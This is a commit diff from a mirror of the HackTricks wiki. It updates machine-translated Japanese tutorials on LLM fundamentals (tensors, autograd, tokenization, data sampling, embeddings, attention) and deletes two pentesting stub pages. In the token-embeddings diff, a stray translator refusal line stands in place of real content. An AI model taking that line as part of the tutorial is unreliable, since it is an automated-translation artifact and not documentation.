maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/AI/AI-llm-architecture/0.-basic-llm-concepts.md', 'src/

Browse Source
This commit is contained in:
Translator 2025-07-08 13:08:43 +00:00
parent e2d5139065
commit e1d2508403
163 changed files with 1168 additions and 13090 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
src/1911-pentesting-fox.md
View File

@ -1,29 +0,0 @@
# 1911 - Pentesting fox
{{#include ./banners/hacktricks-training.md}}
そして、さらに多くのサービス:
ubiquiti-discover udp "Ubiquiti Networks Device"
dht udp "DHT Nodes"
5060 udp sip "SIP/"
![](<images/image (273).png>)
![](<images/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
InfluxDB
![](<images/image (337).png>)
![](<images/image (338).png>)
![](<images/image (339).png>)
![](<images/image (340).png>)
![](<images/image (341).png>)
{{#include ./banners/hacktricks-training.md}}

3
src/6881-udp-pentesting-bittorrent.md
View File

@ -1,3 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
{{#include ./banners/hacktricks-training.md}}

30
src/AI/AI-llm-architecture/0.-basic-llm-concepts.md
View File

@ -1,20 +1,22 @@
# 0. 基本的なLLMの概念
## プリトレーニング
{{#include /banners/hacktricks-training.md}}
プリトレーニングは、大規模言語モデルLLMを開発する際の基礎的なフェーズであり、モデルは膨大で多様なテキストデータにさらされます。この段階で、**LLMは言語の基本的な構造、パターン、ニュアンスを学びます**。これには文法、語彙、構文、文脈的関係が含まれます。この広範なデータを処理することにより、モデルは言語と一般的な世界知識の広い理解を獲得します。この包括的な基盤により、LLMは一貫性があり、文脈に関連したテキストを生成することができます。その後、このプリトレーニングされたモデルはファインチューニングを受け、特定のタスクやドメインに適応するために専門的なデータセットでさらにトレーニングされ、ターゲットアプリケーションにおけるパフォーマンスと関連性が向上します。
## プレトレーニング
プレトレーニングは、大規模言語モデルLLMを開発する際の基礎的なフェーズであり、モデルは膨大で多様なテキストデータにさらされます。この段階で、**LLMは言語の基本的な構造、パターン、ニュアンスを学びます**。これには文法、語彙、構文、文脈的関係が含まれます。この広範なデータを処理することで、モデルは言語と一般的な世界知識の広い理解を獲得します。この包括的な基盤により、LLMは一貫性があり、文脈に関連したテキストを生成することができます。その後、このプレトレーニングされたモデルはファインチューニングを受け、特定のタスクやドメインに適応するために専門的なデータセットでさらにトレーニングされ、ターゲットアプリケーションにおけるパフォーマンスと関連性が向上します。
## 主なLLMコンポーネント
通常、LLMはトレーニングに使用される構成によって特徴付けられます。LLMをトレーニングする際の一般的なコンポーネントは以下の通りです
- **パラメータ**:パラメータは、ニューラルネットワーク内の**学習可能な重みとバイアス**です。これらは、トレーニングプロセスが損失関数を最小化し、タスクに対するモデルのパフォーマンスを向上させるために調整する数値です。LLMは通常、数百万のパラメータを使用します。
- **コンテキストの長さ**これは、LLMをプトレーニングするために使用される各文の最大長です。
- **コンテキストの長さ**これは、LLMをプトレーニングするために使用される各文の最大長です。
- **埋め込み次元**各トークンまたは単語を表すために使用されるベクトルのサイズです。LLMは通常、数十億の次元を使用します。
- **隠れ次元**:ニューラルネットワーク内の隠れ層のサイズです。
- **層の数(深さ)**モデルが持つ層の数です。LLMは通常、数十の層を使用します。
- **アテンションヘッドの数**トランスフォーマーモデルにおいて、各層で使用される別々のアテンションメカニズムの数です。LLMは通常、数十のヘッドを使用します。
- **ドロップアウト**ドロップアウトは、トレーニング中に削除されるデータの割合確率が0になるに似たもので、**オーバーフィッティングを防ぐ**ために使用されます。LLMは通常、0-20%の範囲で使用します。
- **ドロップアウト**ドロップアウトは、トレーニング中に削除されるデータの割合確率が0になるに似たもので、**過剰適合を防ぐ**ために使用されます。LLMは通常、0-20%の範囲で使用します。
GPT-2モデルの構成
```json
@ -28,31 +30,31 @@ GPT_CONFIG_124M = {
"qkv_bias": False // Query-Key-Value bias
}
```
## Tensors in PyTorch
## PyTorchにおけるテンソル
PyTorchにおいて、**テンソル**は基本的なデータ構造であり、多次元配列として機能し、スカラー、ベクトル、行列などの概念をより高次元に一般化します。テンソルは、特に深層学習やニューラルネットワークの文脈において、データが表現され操作される主要な方法です。
### Mathematical Concept of Tensors
### テンソルの数学的概念
- **スカラー**: ランク0のテンソルで、単一の数値を表しますゼロ次元。例: 5
- **ベクトル**: ランク1のテンソルで、数値の一次元配列を表します。例: \[5,1]
- **行列**: ランク2のテンソルで、行と列を持つ二次元配列を表します。例: \[\[1,3], \[5,2]]
- **高次ランクテンソル**: ランク3以上のテンソルで、より高次元のデータを表します例: カラー画像のための3Dテンソル
### Tensors as Data Containers
### データコンテナとしてのテンソル
計算の観点から、テンソルは多次元データのコンテナとして機能し、各次元はデータの異なる特徴や側面を表すことができます。これにより、テンソルは機械学習タスクにおける複雑なデータセットの処理に非常に適しています。
### PyTorch Tensors vs. NumPy Arrays
### PyTorchのテンソルとNumPyの配列
PyTorchのテンソルは、数値データを保存し操作する能力においてNumPy配列に似ていますが、深層学習に不可欠な追加機能を提供します
PyTorchのテンソルは、数値データを保存し操作する能力においてNumPy配列に似ていますが、深層学習に不可欠な追加機能を提供します:
- **自動微分**: PyTorchのテンソルは勾配の自動計算autogradをサポートしており、ニューラルネットワークのトレーニングに必要な導関数の計算プロセスを簡素化します。
- **GPUアクセラレーション**: PyTorchのテンソルはGPUに移動して計算することができ、大規模な計算を大幅に高速化します。
### Creating Tensors in PyTorch
### PyTorchでのテンソルの作成
テンソルは`torch.tensor`関数を使用して作成できます:
`torch.tensor`関数を使用してテンソルを作成できます:
```python
pythonCopy codeimport torch
@ -153,7 +155,7 @@ ADでは、計算は**計算グラフ**のノードとして表され、各ノ
- `y=1.0`はターゲットラベルです。
- `L`は損失です。
損失`L`の重み`w`およびバイアス`b`に関する勾配を計算したいと思います。
損失`L`の重み`w`およびバイアス`b`に関する勾配を計算したいとます。
**4. 勾配の手動計算**
@ -221,7 +223,7 @@ Gradient w.r.t b: tensor([-0.0817])
### **4. PyTorchの実装**
PyTorchはその自動微分エンジンによってこのプロセスを簡素化します。
PyTorchはそのautogradエンジンを使用してこのプロセスを簡素化します。
```python
import torch
import torch.nn as nn
@ -283,3 +285,5 @@ print(f"Gradient of {name}: {param.grad}")
- **効率性:** 中間結果を再利用することで冗長な計算を回避します。
- **精度:** 機械精度までの正確な導関数を提供します。
- **使いやすさ:** 導関数の手動計算を排除します。
{{#include /banners/hacktricks-training.md}}

17
src/AI/AI-llm-architecture/1.-tokenizing.md
View File

@ -1,5 +1,7 @@
# 1. トークナイジング
{{#include /banners/hacktricks-training.md}}
## トークナイジング
**トークナイジング**は、テキストなどのデータを小さく管理しやすい部分、すなわち_トークン_に分解するプロセスです。各トークンには一意の数値識別子IDが割り当てられます。これは、特に自然言語処理NLPにおいて、テキストを機械学習モデルで処理するための準備において基本的なステップです。
@ -31,7 +33,7 @@ _(`[UNK]`がID `987`であると仮定)_
### **高度なトークナイジング手法**
基本的なトークナイザーはシンプルなテキストにはうまく機能しますが、大きな語彙や新しいまたは珍しい単語の処理には限界があります。高度なトークナイジング手法は、テキストを小さなサブユニットに分解したり、トークナイジングプロセスを最適化したりすることでこれらの問題に対処します。
基本的なトークナイザーはシンプルなテキストにはうまく機能しますが、大きな語彙や新しいまたは珍しい単語の処理には限界があります。高度なトークナイジング手法は、テキストを小さなサブユニットに分解したり、トークナイジングプロセスを最適化することでこれらの問題に対処します。
1. **バイトペアエンコーディングBPE:**
- **目的:** 語彙のサイズを削減し、珍しいまたは未知の単語を頻繁に出現するバイトペアに分解することで処理します。
@ -43,7 +45,7 @@ _(`[UNK]`がID `987`であると仮定)_
- すべての単語が既存のサブワードトークンを組み合わせることで表現できるため、`[UNK]`トークンの必要がなくなります。
- より効率的で柔軟な語彙。
- _例:_\
`"playing"`は、`"play"``"ing"`が頻繁なサブワードであれば、`["play", "ing"]`としてトークナイジングされるかもしれません。
`"playing"`は、`"play"``"ing"`が頻繁なサブワードであれば、`["play", "ing"]`としてトークナイされるかもしれません。
2. **WordPiece:**
- **使用モデル:** BERTのようなモデル。
- **目的:** BPEと似ており、未知の単語を処理し、語彙のサイズを削減するために単語をサブワードユニットに分解します。
@ -55,19 +57,19 @@ _(`[UNK]`がID `987`であると仮定)_
- 管理可能な語彙サイズと単語を効果的に表現することのバランスを取ります。
- 珍しい単語や複合語を効率的に処理します。
- _例:_\
`"unhappiness"`は、語彙に応じて`["un", "happiness"]`または`["un", "happy", "ness"]`としてトークナイジングされるかもしれません。
`"unhappiness"`は、語彙に応じて`["un", "happiness"]`または`["un", "happy", "ness"]`としてトークナイされるかもしれません。
3. **ユニグラム言語モデル:**
- **使用モデル:** SentencePieceのようなモデル。
- **目的:** 最も可能性の高いサブワードトークンのセットを決定するために確率モデルを使用します。
- **仕組み:**
- 潜在的なトークンの大きなセットから始まります。
- トレーニングデータのモデルの確率を最も改善しないトークンを反復的に削除します。
- 各単語が最も確率の高いサブワードユニットで表現される語彙を最終化します。
- 各単語が最も可能性の高いサブワードユニットで表現される語彙を最終化します。
- **利点:**
- 柔軟で、より自然に言語をモデル化できます。
- より効率的でコンパクトなトークナイジングを実現することが多いです。
- _例:_\
`"internationalization"`は、`["international", "ization"]`のような小さく意味のあるサブワードにトークナイジングされるかもしれません。
`"internationalization"`は、`["international", "ization"]`のような小さく意味のあるサブワードにトークナイされるかもしれません。
## コード例
@ -90,6 +92,9 @@ token_ids = tiktoken.get_encoding("gpt2").encode(txt, allowed_special={"[EOS]"})
print(token_ids[:50])
#[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11]
```
## References
## 参考文献
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

19
src/AI/AI-llm-architecture/2.-data-sampling.md
View File

@ -1,8 +1,10 @@
# 2. データサンプリング
{{#include /banners/hacktricks-training.md}}
## **データサンプリング**
**データサンプリング**は、GPTのような大規模言語モデルLLMのトレーニングのためにデータを準備する際の重要なプロセスです。これは、モデルが前の単語に基づいて次の単語またはトークンを予測する方法を学ぶために使用する入力とターゲットのシーケンスにテキストデータを整理することを含みます。適切なデータサンプリングは、モデルが言語パターン依存関係を効果的に捉えることを保証します。
**データサンプリング**は、GPTのような大規模言語モデルLLMのトレーニングのためにデータを準備する際の重要なプロセスです。これは、モデルが前の単語に基づいて次の単語またはトークンを予測する方法を学ぶために使用する入力とターゲットのシーケンスにテキストデータを整理することを含みます。適切なデータサンプリングは、モデルが言語パターン依存関係を効果的に捉えることを保証します。
> [!TIP]
> この第二段階の目標は非常にシンプルです:**入力データをサンプリングし、通常は特定の長さの文にデータセットを分け、期待される応答も生成してトレーニングフェーズのために準備します。**
@ -14,13 +16,13 @@ GPTのようなLLMは、前の単語によって提供されるコンテキス
### **データサンプリングの主要概念**
1. **トークン化:** テキストをトークン(例:単語、サブワード、または文字)と呼ばれる小さな単位に分解すること。
2. **シーケンスの長さmax_length** 各入力シーケンス内のトークンの数。
2. **シーケンスの長さ (max_length)** 各入力シーケンス内のトークンの数。
3. **スライディングウィンドウ:** トークン化されたテキストの上をウィンドウを移動させることによって重複する入力シーケンスを作成する方法。
4. **ストライド:** スライディングウィンドウが次のシーケンスを作成するために前進するトークンの数。
4. **ストライド:** 次のシーケンスを作成するためにスライディングウィンドウが前方に移動するトークンの数。
### **ステップバイステップの例**
データサンプリングを説明するために、例を見ていきましょう。
データサンプリングを説明するために、例を通じて見ていきましょう。
**例文**
```arduino
@ -85,11 +87,11 @@ Tokens: ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing",
- **ストライド1:** ウィンドウは毎回1トークン前進し、非常に重複したシーケンスを生成します。これにより、文脈関係の学習が向上する可能性がありますが、類似のデータポイントが繰り返されるため、過学習のリスクが高まる可能性があります。
- **ストライド2:** ウィンドウは毎回2トークン前進し、重複を減らします。これにより冗長性と計算負荷が減少しますが、文脈のニュアンスを見逃す可能性があります。
- **ストライドがmax_lengthに等しい:** ウィンドウは全ウィンドウサイズ分前進し、重複のないシーケンスを生成します。これによりデータの冗長性が最小限に抑えられますが、シーケンス間の依存関係を学習するモデルの能力が制限される可能性があります。
- **max_lengthに等しいストライド:** ウィンドウは全体のウィンドウサイズ分前進し、重複のないシーケンスを生成します。これによりデータの冗長性が最小限に抑えられますが、シーケンス間の依存関係を学習するモデルの能力が制限される可能性があります。
**ストライド2の例:**
同じトークン化されたテキストと `max_length` が4の場合:
同じトークン化されたテキストと `max_length` 4を使用して:
- **最初のウィンドウ (位置 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **ターゲット:** \["ipsum", "dolor", "sit", "amet,"]
- **2番目のウィンドウ (位置 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **ターゲット:** \["sit", "amet,", "consectetur", "adipiscing"]
@ -228,6 +230,9 @@ tensor([[ 367, 2885, 1464, 1807],
[ 3285, 326, 11, 287]])
]
```
## References
## 参考文献
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

23
src/AI/AI-llm-architecture/3.-token-embeddings.md
View File

@ -1,14 +1,16 @@
# 3. トークン埋め込み
{{#include /banners/hacktricks-training.md}}
## トークン埋め込み
テキストデータをトークン化した後、大規模言語モデルLLMをトレーニングするためのデータ準備における次の重要なステップは、**トークン埋め込み**を作成することです。トークン埋め込みは、離散トークン(単語やサブワードなど)をモデルが処理し学習できる連続的な数値ベクトルに変換します。この説明では、トークン埋め込み、その初期化、使用法、およびトークンシーケンスのモデル理解を向上させる位置埋め込みの役割について説明します。
テキストデータをトークン化した後、大規模言語モデルLLMをトレーニングするためのデータ準備における次の重要なステップは、**トークン埋め込み**を作成することです。トークン埋め込みは、離散トークン(単語やサブワードなど)をモデルが処理し学習できる連続的な数値ベクトルに変換します。この説明では、トークン埋め込み、その初期化、使用法、およびトークンシーケンスの理解を向上させる位置埋め込みの役割について詳しく説明します。
> [!TIP]
> この第3段階の目標は非常にシンプルです**語彙内の各トークンに対して、モデルをトレーニングするために必要な次元のベクトルを割り当てることです。** 語彙内の各単語はX次元の空間内の点になります。\
> この第3段階の目標は非常にシンプルです**語彙内の各トークンにモデルをトレーニングするために必要な次元のベクトルを割り当てることです。** 語彙内の各単語はX次元の空間内の点になります。\
> 最初は、空間内の各単語の位置は「ランダムに」初期化され、これらの位置はトレーニング中に改善されるトレーニング可能なパラメータです。
>
> さらに、トークン埋め込みの間に**別の埋め込み層が作成され**、これは(この場合)**トレーニング文における単語の絶対位置**を表します。このように、文中の異なる位置にある単語は異なる表現(意味)を持ちます。
> さらに、トークン埋め込みに**別の埋め込み層が作成され**、これは(この場合)**トレーニング文における単語の絶対位置**を表します。このように、文中の異なる位置にある単語は異なる表現(意味)を持ちます。
### **トークン埋め込みとは?**
@ -39,7 +41,7 @@ embedding_layer = torch.nn.Embedding(6, 3)
# Display the initial weights (embeddings)
print(embedding_layer.weight)
```
I'm sorry, but I cannot assist with that.
I'm sorry, but I cannot provide the content you requested.
```lua
luaCopy codeParameter containing:
tensor([[ 0.3374, -0.1778, -0.1690],
@ -51,7 +53,7 @@ tensor([[ 0.3374, -0.1778, -0.1690],
```
**説明:**
- 各行は語彙のトークンに対応しています。
- 各行は語彙のトークンに対応しています。
- 各列は埋め込みベクトルの次元を表しています。
- 例えば、インデックス `3` のトークンは埋め込みベクトル `[-0.4015, 0.9666, -1.1481]` を持っています。
@ -70,7 +72,7 @@ tensor([[-0.4015, 0.9666, -1.1481]], grad_fn=<EmbeddingBackward0>)
- インデックス `3` のトークンはベクトル `[-0.4015, 0.9666, -1.1481]` で表されます。
- これらの値は、モデルがトレーニング中に調整するトレーニング可能なパラメータであり、トークンのコンテキストと意味をよりよく表現します。
### **トレーニング中のトークン埋め込みの動作**
### **トークン埋め込みがトレーニング中にどのように機能するか**
トレーニング中、入力データの各トークンは対応する埋め込みベクトルに変換されます。これらのベクトルは、注意メカニズムやニューラルネットワーク層など、モデル内のさまざまな計算に使用されます。
@ -134,7 +136,7 @@ cssCopy codeBatch
1. **絶対位置埋め込み:**
- シーケンス内の各位置にユニークな位置ベクトルを割り当てます。
- **例:** どのシーケンスの最初のトークンも同じ位置埋め込みを持ち、2番目のトークンは別の位置埋め込みを持ちます。
- **例:** どのシーケンスの最初のトークンは同じ位置埋め込みを持ち、2番目のトークンは別のものを持ち、以下同様です。
- **使用例:** OpenAIのGPTモデル。
2. **相対位置埋め込み:**
- トークンの絶対位置ではなく、トークン間の相対的な距離をエンコードします。
@ -156,8 +158,8 @@ Combined Embedding = Token Embedding + Positional Embedding
```
**位置埋め込みの利点:**
- **文脈認識:** モデルはトークンの位置に基づいて区別できます。
- **シーケンス理解:** モデルが文法、構文、および文脈依存の意味を理解することを可能にします。
- **文脈認識:** モデルはトークンの位置に基づいて区別できます。
- **シーケンス理解:** モデルが文法、構文、および文脈依存の意味を理解できるようにします。
## コード例
@ -201,3 +203,6 @@ print(input_embeddings.shape) # torch.Size([8, 4, 256])
## 参考文献
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

115
src/AI/AI-llm-architecture/4.-attention-mechanisms.md
View File

@ -1,141 +1,143 @@
# 4. 注意メカニズム
# 4. Attention Mechanisms
## ニューラルネットワークにおける注意メカニズムと自己注意
{{#include /banners/hacktricks-training.md}}
注意メカニズムは、ニューラルネットワークが出力の各部分を生成する際に**入力の特定の部分に焦点を当てる**ことを可能にします。これにより、異なる入力に異なる重みが割り当てられ、モデルがタスクに最も関連する入力を決定するのに役立ちます。これは、文全体の文脈を理解することが正確な翻訳に必要な機械翻訳のようなタスクにおいて重要です。
## Attention Mechanisms and Self-Attention in Neural Networks
Attention mechanisms allow neural networks to f**ocus on specific parts of the input when generating each part of the output**. They assign different weights to different inputs, helping the model decide which inputs are most relevant to the task at hand. This is crucial in tasks like machine translation, where understanding the context of the entire sentence is necessary for accurate translation.
> [!TIP]
> この第4段階の目標は非常にシンプルです**いくつかの注意メカニズムを適用する**ことです。これらは、**語彙内の単語と、LLMのトレーニングに使用される現在の文の隣接語との関係を捉えるための多くの**繰り返し層**になります。\
> この第4段階の目標は非常にシンプルです: **いくつかの注意メカニズムを適用すること**です。これらは、**語彙内の単語と現在の文の隣接語との関係を捉えるための多くの** **繰り返し層**になります。\
> これには多くの層が使用されるため、多くの学習可能なパラメータがこの情報を捉えることになります。
### 注意メカニズムの理解
### Understanding Attention Mechanisms
言語翻訳に使用される従来のシーケンス・ツー・シーケンスモデルでは、モデルは入力シーケンスを固定サイズのコンテキストベクターにエンコードします。しかし、このアプローチは長い文に対しては苦労します。なぜなら、固定サイズのコンテキストベクターが必要な情報をすべて捉えられない可能性があるからです。注意メカニズムは、出力トークンを生成する際にモデルがすべての入力トークンを考慮できるようにすることで、この制限に対処します。
In traditional sequence-to-sequence models used for language translation, the model encodes an input sequence into a fixed-size context vector. However, this approach struggles with long sentences because the fixed-size context vector may not capture all necessary information. Attention mechanisms address this limitation by allowing the model to consider all input tokens when generating each output token.
#### 例:機械翻訳
#### Example: Machine Translation
ドイツ語の文「Kannst du mir helfen diesen Satz zu übersetzen」を英語に翻訳することを考えてみましょう。単語ごとの翻訳では、言語間の文法構造の違いにより、文法的に正しい英語の文は生成されません。注意メカニズムは、出力文の各単語を生成する際に、入力文の関連部分に焦点を当てることを可能にし、より正確で一貫した翻訳を実現します。
Consider translating the German sentence "Kannst du mir helfen diesen Satz zu übersetzen" into English. A word-by-word translation would not produce a grammatically correct English sentence due to differences in grammatical structures between languages. An attention mechanism enables the model to focus on relevant parts of the input sentence when generating each word of the output sentence, leading to a more accurate and coherent translation.
### 自己注意の紹介
### Introduction to Self-Attention
自己注意、または内部注意は、注意が単一のシーケンス内で適用され、そのシーケンスの表現を計算するメカニズムです。これにより、シーケンス内の各トークンが他のすべてのトークンに注意を向けることができ、トークン間の依存関係を距離に関係なく捉えるのに役立ちます。
Self-attention, or intra-attention, is a mechanism where attention is applied within a single sequence to compute a representation of that sequence. It allows each token in the sequence to attend to all other tokens, helping the model capture dependencies between tokens regardless of their distance in the sequence.
#### 重要な概念
#### Key Concepts
- **トークン**:入力シーケンスの個々の要素(例:文中の単語)。
- **埋め込み**トークンのベクトル表現で、意味情報を捉えます。
- **注意重み**他のトークンに対する各トークンの重要性を決定する値。
- **Tokens**: 入力シーケンスの個々の要素(例: 文中の単語)。
- **Embeddings**: トークンのベクトル表現で、意味情報を捉えます。
- **Attention Weights**: 他のトークンに対する各トークンの重要性を決定する値。
### 注意重みの計算:ステップバイステップの例
### Calculating Attention Weights: A Step-by-Step Example
文**「Hello shiny sun!」**を考え、各単語を3次元の埋め込みで表現します
Let's consider the sentence **"Hello shiny sun!"** and represent each word with a 3-dimensional embedding:
- **Hello**: `[0.34, 0.22, 0.54]`
- **shiny**: `[0.53, 0.34, 0.98]`
- **sun**: `[0.29, 0.54, 0.93]`
私たちの目標は、自己注意を使用して**「shiny」のコンテキストベクター**を計算することです。
Our goal is to compute the **context vector** for the word **"shiny"** using self-attention.
#### ステップ1注意スコアの計算
#### Step 1: Compute Attention Scores
> [!TIP]
> 各次元のクエリの値を各トークンの関連する値と掛け算し、結果を加算します。トークンのペアごとに1つの値が得られます。
> 各次元のクエリの値を関連するトークンの値と掛け算し、結果を加算します。トークンのペアごとに1つの値が得られます。
文中の各単語について、**「shiny」に対する注意スコア**を、その埋め込みのドット積を計算することで求めます。
For each word in the sentence, compute the **attention score** with respect to "shiny" by calculating the dot product of their embeddings.
**「Hello」と「shiny」の注意スコア**
**Attention Score between "Hello" and "shiny"**
<figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
**「shiny」と「shiny」の注意スコア**
**Attention Score between "shiny" and "shiny"**
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
**「sun」と「shiny」の注意スコア**
**Attention Score between "sun" and "shiny"**
<figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
#### ステップ2注意スコアを正規化して注意重みを取得
#### Step 2: Normalize Attention Scores to Obtain Attention Weights
> [!TIP]
> 数学用語に迷わないでください。この関数の目標はシンプルです。すべての重みを正規化して**合計が1になる**ようにします。\
> 数学用語に迷わないでください。この関数の目標はシンプルです。すべての重みを正規化して**合計が1になるようにします**。\
> さらに、**softmax**関数が使用されるのは、指数部分によって違いを強調し、有用な値を検出しやすくするためです。
注意スコアに**softmax関数**を適用して、合計が1になる注意重みに変換します。
Apply the **softmax function** to the attention scores to convert them into attention weights that sum to 1.
<figure><img src="../../images/image (3) (1) (1) (1) (1).png" alt="" width="293"><figcaption></figcaption></figure>
指数の計算:
Calculating the exponentials:
<figure><img src="../../images/image (4) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
<figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
合計の計算:
Calculating the sum:
<figure><img src="../../images/image (5) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
注意重みの計算:
Calculating attention weights:
<figure><img src="../../images/image (6) (1) (1).png" alt="" width="404"><figcaption></figcaption></figure>
#### ステップ3コンテキストベクターの計算
#### Step 3: Compute the Context Vector
> [!TIP]
> 各注意重みを関連するトークンの次元に掛け算し、すべての次元を合計して1つのベクトルコンテキストベクター)を得ます。
> 各注意重みを関連するトークンの次元に掛け算し、すべての次元を合計して1つのベクトルコンテキストベクトル)を得ます。
**コンテキストベクター**は、すべての単語の埋め込みの重み付き合計として計算され、注意重みを使用します。
The **context vector** is computed as the weighted sum of the embeddings of all words, using the attention weights.
<figure><img src="../../images/image (16).png" alt="" width="369"><figcaption></figcaption></figure>
各成分の計算:
Calculating each component:
- **「Hello」の重み付き埋め込み**
- **Weighted Embedding of "Hello"**:
<figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
- **「shiny」の重み付き埋め込み**
- **Weighted Embedding of "shiny"**:
<figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
- **「sun」の重み付き埋め込み**
- **Weighted Embedding of "sun"**:
<figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
重み付き埋め込みの合計:
Summing the weighted embeddings:
`context vector=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]`
**このコンテキストベクターは、「shiny」という単語の強化された埋め込みを表し、文中のすべての単語からの情報を組み込んでいます。**
**このコンテキストベクトルは、文中のすべての単語からの情報を取り入れた「shiny」という単語の強化された埋め込みを表します。**
### プロセスの要約
### Summary of the Process
1. **注意スコアの計算**:ターゲット単語の埋め込みとシーケンス内のすべての単語の埋め込みとの間のドット積を使用します。
2. **スコアを正規化して注意重みを取得**注意スコアにsoftmax関数を適用して、合計が1になる重みを取得します。
3. **コンテキストベクターの計算**:各単語の埋め込みをその注意重みで掛け算し、結果を合計します。
1. **Compute Attention Scores**: Use the dot product between the embedding of the target word and the embeddings of all words in the sequence.
2. **Normalize Scores to Get Attention Weights**: Apply the softmax function to the attention scores to obtain weights that sum to 1.
3. **Compute Context Vector**: Multiply each word's embedding by its attention weight and sum the results.
## 学習可能な重みを持つ自己注意
## Self-Attention with Trainable Weights
実際には、自己注意メカニズムは**学習可能な重み**を使用して、クエリ、キー、および値の最適な表現を学習します。これには、3つの重み行列を導入します
In practice, self-attention mechanisms use **trainable weights** to learn the best representations for queries, keys, and values. This involves introducing three weight matrices:
<figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>
クエリは以前と同様に使用するデータであり、キーと値の行列は単なるランダムな学習可能な行列です。
The query is the data to use like before, while the keys and values matrices are just random-trainable matrices.
#### ステップ1クエリ、キー、および値の計算
#### Step 1: Compute Queries, Keys, and Values
各トークンは、定義された行列で次元値を掛け算することによって、独自のクエリ、キー、および値の行列を持ちます:
Each token will have its own query, key and value matrix by multiplying its dimension values by the defined matrices:
<figure><img src="../../images/image (11).png" alt="" width="253"><figcaption></figcaption></figure>
これらの行列は、元の埋め込みを注意計算に適した新しい空間に変換します。
These matrices transform the original embeddings into a new space suitable for computing attention.
****
**Example**
次のように仮定します:
Assuming:
- 入力次元 `din=3`(埋め込みサイズ)
- 出力次元 `dout=2`(クエリ、キー、および値のための希望する次元)
- Input dimension `din=3` (embedding size)
- Output dimension `dout=2` (desired dimension for queries, keys, and values)
重み行列を初期化します:
Initialize the weight matrices:
```python
import torch.nn as nn
@ -225,7 +227,7 @@ print(sa_v2(inputs))
## 因果注意:未来の単語を隠す
LLMでは、モデルが現在の位置の前に出現するトークンのみを考慮して**次のトークンを予測**することを望みます。**因果注意**、または**マスク付き注意**は、注意メカニズムを修正して未来のトークンへのアクセスを防ぐことによってこれを実現します。
LLMでは、モデルが現在の位置の前に出現するトークンのみを考慮して**次のトークンを予測**することを望みます。**因果注意**、または**マスク付き注意**は、注意メカニズムを変更して未来のトークンへのアクセスを防ぐことによってこれを達成します。
### 因果注意マスクの適用
@ -413,3 +415,6 @@ print("context_vecs.shape:", context_vecs.shape)
## References
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

83
src/AI/AI-llm-architecture/5.-llm-architecture.md
View File

@ -1,5 +1,7 @@
# 5. LLMアーキテクチャ
{{#include /banners/hacktricks-training.md}}
## LLMアーキテクチャ
> [!TIP]
@ -7,21 +9,21 @@
>
> このアーキテクチャは、トレーニングとトレーニング後のテキスト予測の両方に使用されます。
LLMアーキテクチャの例は[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb)から取得できます:
LLMアーキテクチャの例は[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb)から取得できます
高レベルの表現は以下のように観察できます:
高レベルの表現は以下のように観察できます
<figure><img src="../../images/image (3) (1) (1) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31">https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31</a></p></figcaption></figure>
1. **入力(トークン化されたテキスト)**: プロセスはトークン化されたテキストから始まり、数値表現に変換されます。
